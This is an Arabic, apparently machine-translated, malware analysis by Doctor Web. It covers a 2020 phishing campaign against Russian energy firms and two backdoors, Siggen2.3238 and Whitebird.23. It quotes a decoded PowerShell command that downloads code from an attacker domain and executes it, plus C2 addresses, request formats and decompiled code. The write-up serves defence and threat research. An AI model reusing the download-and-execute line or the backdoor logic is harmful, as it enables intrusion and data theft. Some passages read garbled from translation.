تُظهر خبرتنا في التحقيق في حوادث أمان الكمبيوتر أن البريد الإلكتروني لا يزال أحد القنوات الأكثر شيوعًا التي يستخدمها المهاجمون لاختراق البنية التحتية للشبكات التي تعرضت للهجوم في البداية. يصبح أي إجراء مهمل باستخدام خطاب مشبوه (أو غير مريب جدًا) نقطة دخول لمزيد من العدوى، ولهذا السبب يستخدم مجرمو الإنترنت أساليب الهندسة الاجتماعية بنشاط، وإن كان ذلك بدرجات متفاوتة من النجاح.
نريد في هذا المنشور أن نتحدث عن تحقيقنا الأخير في حملة البريد العشوائي التي استهدفت عددًا من الشركات في مجمع الوقود والطاقة الروسي. اتبعت جميع الهجمات نفس السيناريو باستخدام رسائل البريد الإلكتروني المزيفة، ويبدو أن لا أحد بذل الكثير من الجهد في المحتوى النصي لرسائل البريد الإلكتروني هذه.
استكشاف
بدأ كل شيء في نهاية أبريل 2020، عندما اكتشف محللو فيروسات Doctor Web حملة بريد عشوائي أرسل فيها المتسللون دليل هاتف محدثًا لموظفي عدد من الشركات في مجمع الوقود والطاقة الروسي. بالطبع، لم يكن هذا مجرد إظهار للقلق، نظرًا لأن الدليل لم يكن حقيقيًا، كما قامت مستندات .docx بتنزيل صورتين من موارد بعيدة.
تم تنزيل إحداها على جهاز الكمبيوتر الخاص بالمستخدم من خادم news[.]zannews[.]com. ومن الجدير بالذكر أن اسم النطاق مشابه لنطاق المركز الإعلامي لمكافحة الفساد في كازاخستان - zannews[.]kz. من ناحية أخرى، كان النطاق المستخدم يذكرنا على الفور بحملة أخرى عام 2015 تُعرف باسم TOPNEWS، والتي استخدمت بابًا خلفيًا من ICEFOG وكان لها نطاقات تحكم طروادة مع السلسلة الفرعية "أخبار" في أسمائها. ميزة أخرى مثيرة للاهتمام هي أنه عند إرسال رسائل البريد الإلكتروني إلى مستلمين مختلفين، تستخدم طلبات تنزيل الصورة إما معلمات طلب مختلفة أو أسماء صور فريدة.
نعتقد أن هذا تم بغرض جمع المعلومات لتحديد هوية المرسل إليه "الموثوق"، والذي سيتم بعد ذلك ضمان فتح الرسالة في الوقت المناسب. تم استخدام بروتوكول SMB لتنزيل الصورة من الخادم الثاني، وهو ما يمكن القيام به لجمع تجزئات NetNTLM من أجهزة الكمبيوتر الخاصة بالموظفين الذين فتحوا المستند المستلم.
وهذه هي الرسالة نفسها مع الدليل المزيف:
وفي يونيو من هذا العام، بدأ المتسللون في استخدام اسم نطاق جديد، Sports[.]manhajnews[.]com، لتحميل الصور. أظهر التحليل أن نطاقات manhajnews[.]com الفرعية قد تم استخدامها في رسائل البريد العشوائي منذ سبتمبر 2019 على الأقل. وكان أحد أهداف هذه الحملة جامعة روسية كبيرة.
وبحلول شهر يونيو أيضًا، توصل منظمو الهجوم إلى نص جديد لرسائلهم: هذه المرة تحتوي الوثيقة على معلومات حول تطور الصناعة. يشير نص الرسالة بوضوح إلى أن كاتبها إما لم يكن متحدثًا أصليًا للغة الروسية، أو أنه كان يتعمد خلق مثل هذا الانطباع عن نفسه. لسوء الحظ، أفكار تطوير الصناعة، كما هو الحال دائمًا، تبين أنها مجرد غلاف - قام المستند مرة أخرى بتنزيل صورتين، بينما تم تغيير الخادم لتنزيل[.]inklingpaper[.]com.
وجاء الابتكار التالي في يوليو. في محاولة لتجاوز الكشف عن المستندات الضارة بواسطة برامج مكافحة الفيروسات، بدأ المهاجمون في استخدام مستندات Microsoft Word المشفرة بكلمة مرور. في الوقت نفسه، قرر المهاجمون استخدام تقنية الهندسة الاجتماعية الكلاسيكية - إشعار المكافأة.
تمت كتابة نص الاستئناف مرة أخرى بنفس الأسلوب، مما أثار شكًا إضافيًا لدى المرسل إليه. كما لم يتغير خادم تنزيل الصورة.
لاحظ أنه في جميع الحالات، تم استخدام صناديق البريد الإلكترونية المسجلة على نطاقات mail[.]ru وyandex[.]ru لإرسال الرسائل.
هجوم
بحلول أوائل سبتمبر 2020، كان وقت العمل قد حان. سجل محللو الفيروسات لدينا موجة جديدة من الهجمات، حيث أرسل المهاجمون رسائل مرة أخرى بحجة تحديث دليل الهاتف. ومع ذلك، هذه المرة يحتوي المرفق على ماكرو ضار.
عند فتح المستند المرفق، قام الماكرو بإنشاء ملفين:
- البرنامج النصي VBS %APPDATA%microsoftwindowsقائمة ابدأprogramsstartupadoba.vbs، والذي كان يهدف إلى تشغيل ملف دفعي؛
- الملف الدفعي نفسه %APPDATA%configstest.bat، والذي كان غامضًا.
يكمن جوهر عملها في إطلاق Powershell Shell بمعلمات معينة. يتم فك تشفير المعلمات التي تم تمريرها إلى الصدفة إلى أوامر:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;كما يلي من الأوامر المقدمة، يتم إخفاء النطاق الذي تم تنزيل الحمولة منه مرة أخرى كموقع إخباري. بسيط ، ومهمته الوحيدة هي تلقي كود القشرة من خادم الأوامر والتحكم وتنفيذه. تمكنا من تحديد نوعين من الأبواب الخلفية التي يمكن تثبيتها على جهاز الكمبيوتر الخاص بالضحية.
BackDoor.Siggen2.3238
اول واحد هو BackDoor.Siggen2.3238 — لم يسبق أن واجهه المتخصصون لدينا من قبل، كما لم يتم ذكر هذا البرنامج من قبل موردي برامج مكافحة الفيروسات الآخرين.
هذا البرنامج عبارة عن باب خلفي مكتوب بلغة C++ ويعمل على أنظمة تشغيل Windows 32 بت.
BackDoor.Siggen2.3238 قادر على التواصل مع خادم الإدارة باستخدام بروتوكولين: HTTP وHTTPS. تستخدم العينة التي تم اختبارها بروتوكول HTTPS. يتم استخدام وكيل المستخدم التالي في الطلبات المقدمة إلى الخادم:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
في هذه الحالة، يتم توفير كافة الطلبات مع مجموعة المعلمات التالية:
%s;type=%s;length=%s;realdata=%send
حيث يتم استبدال كل سطر %s بالمثل بما يلي:
- معرف الكمبيوتر المصاب،
- نوع الطلب الذي يتم إرساله،
- طول البيانات في مجال البيانات الحقيقية،
- البيانات.
في مرحلة جمع المعلومات حول النظام المصاب، يقوم الباب الخلفي بإنشاء خط مثل:
lan=%s;cmpname=%s;username=%s;version=%s;
حيث lan هو عنوان IP للكمبيوتر المصاب، وcmpname هو اسم الكمبيوتر، واسم المستخدم هو اسم المستخدم، والإصدار هو السطر 0.0.4.03.
يتم إرسال هذه المعلومات مع معرف sysinfo عبر طلب POST إلى خادم التحكم الموجود على https[:]//31.214[.]157.14/log.txt. إذا في الرد BackDoor.Siggen2.3238 يتلقى إشارة القلب، ويعتبر الاتصال ناجحًا، ويبدأ الباب الخلفي الدورة الرئيسية للاتصال بالخادم.
وصف أكثر اكتمالا لمبادئ التشغيل BackDoor.Siggen2.3238 هو في لدينا .
BackDoor.Whitebird.23
البرنامج الثاني عبارة عن تعديل لبرنامج BackDoor.Whitebird backdoor، المعروف لنا بالفعل من الحادث الذي وقع مع وكالة حكومية في كازاخستان. هذا الإصدار مكتوب بلغة C++ وهو مصمم للعمل على أنظمة تشغيل Windows 32 بت و64 بت.
مثل معظم البرامج من هذا النوع BackDoor.Whitebird.23 مصمم لإنشاء اتصال مشفر مع خادم التحكم والتحكم غير المصرح به لجهاز الكمبيوتر المصاب. تم تثبيته في نظام مخترق باستخدام قطارة .
كانت العينة التي فحصناها عبارة عن مكتبة ضارة بها تصديران:
- تطبيقات جوجل
- الاختبار.
في بداية عمله، يقوم بفك تشفير التكوين المتصل بجسم الباب الخلفي باستخدام خوارزمية تعتمد على عملية XOR بالبايت 0x99. يبدو التكوين كما يلي:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
ولضمان التشغيل المستمر، يقوم الباب الخلفي بتغيير القيمة المحددة في الحقل ساعات العمل التكوينات. يحتوي الحقل على 1440 بايت، والتي تأخذ القيم 0 أو 1 وتمثل كل دقيقة من كل ساعة في اليوم. يقوم بإنشاء سلسلة رسائل منفصلة لكل واجهة شبكة تستمع إلى الواجهة وتبحث عن حزم التفويض على الخادم الوكيل من الكمبيوتر المصاب. عند اكتشاف مثل هذه الحزمة، يضيف الباب الخلفي معلومات حول الخادم الوكيل إلى قائمته. بالإضافة إلى ذلك، يتحقق من وجود وكيل عبر WinAPI InternetQueryOptionW.
يقوم البرنامج بفحص الدقيقة والساعة الحالية ومقارنتها بالبيانات الموجودة في الحقل ساعات العمل التكوينات. إذا كانت قيمة الدقيقة المقابلة من اليوم ليست صفرًا، فسيتم إنشاء اتصال مع خادم التحكم.
يحاكي إنشاء اتصال بالخادم إنشاء اتصال باستخدام بروتوكول TLS الإصدار 1.0 بين العميل والخادم. يحتوي جسم الباب الخلفي على مخزنين مؤقتين.
يحتوي المخزن المؤقت الأول على حزمة TLS 1.0 Client Hello.
يحتوي المخزن المؤقت الثاني على حزم تبادل مفتاح عميل TLS 1.0 بطول مفتاح يبلغ 0x100 بايت، وتغيير مواصفات التشفير، ورسالة المصافحة المشفرة.
عند إرسال حزمة Client Hello، يكتب الباب الخلفي 4 بايت من الوقت الحالي و28 بايت من البيانات العشوائية الزائفة في حقل Client Random، ويتم حسابها على النحو التالي:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
يتم إرسال الحزمة المستلمة إلى خادم التحكم. تتحقق الاستجابة (حزمة ترحيب الخادم):
- الامتثال لبروتوكول TLS الإصدار 1.0؛
- مطابقة الطابع الزمني (أول 4 بايت من حقل حزمة البيانات العشوائية) المحدد من قبل العميل مع الطابع الزمني المحدد من قبل الخادم؛
- مطابقة أول 4 بايتات بعد الطابع الزمني في حقل البيانات العشوائية للعميل والخادم.
في حالة التطابقات المحددة، يقوم الباب الخلفي بإعداد حزمة Client Key Exchange. للقيام بذلك، يقوم بتعديل المفتاح العام في حزمة Client Key Exchange، بالإضافة إلى التشفير IV وبيانات التشفير في حزمة رسائل المصافحة المشفرة.
يتلقى الباب الخلفي بعد ذلك الحزمة من خادم الأوامر والتحكم، ويتحقق من أن إصدار بروتوكول TLS هو 1.0، ثم يقبل 54 بايت أخرى (نص الحزمة). هذا يكمل إعداد الاتصال.
وصف أكثر اكتمالا لمبادئ التشغيل BackDoor.Whitebird.23 هو في لدينا .
الاستنتاجات والاستنتاجات
يتيح لنا تحليل المستندات والبرامج الضارة والبنية التحتية المستخدمة أن نقول بثقة أن الهجوم تم إعداده من قبل إحدى مجموعات APT الصينية. وبالنظر إلى وظائف الأبواب الخلفية المثبتة على أجهزة الكمبيوتر الخاصة بالضحايا في حالة وقوع هجوم ناجح، تؤدي الإصابة، على الأقل، إلى سرقة المعلومات السرية من أجهزة الكمبيوتر الخاصة بالمنظمات التي تعرضت للهجوم.
بالإضافة إلى ذلك، السيناريو المحتمل جدًا هو تثبيت أحصنة طروادة المتخصصة على الخوادم المحلية بوظيفة خاصة. يمكن أن تكون هذه وحدات تحكم المجال، وخوادم البريد، وبوابات الإنترنت، وما إلى ذلك. كما يمكننا أن نرى في المثال تعتبر هذه الخوادم ذات أهمية خاصة للمهاجمين لأسباب مختلفة.
المصدر: www.habr.com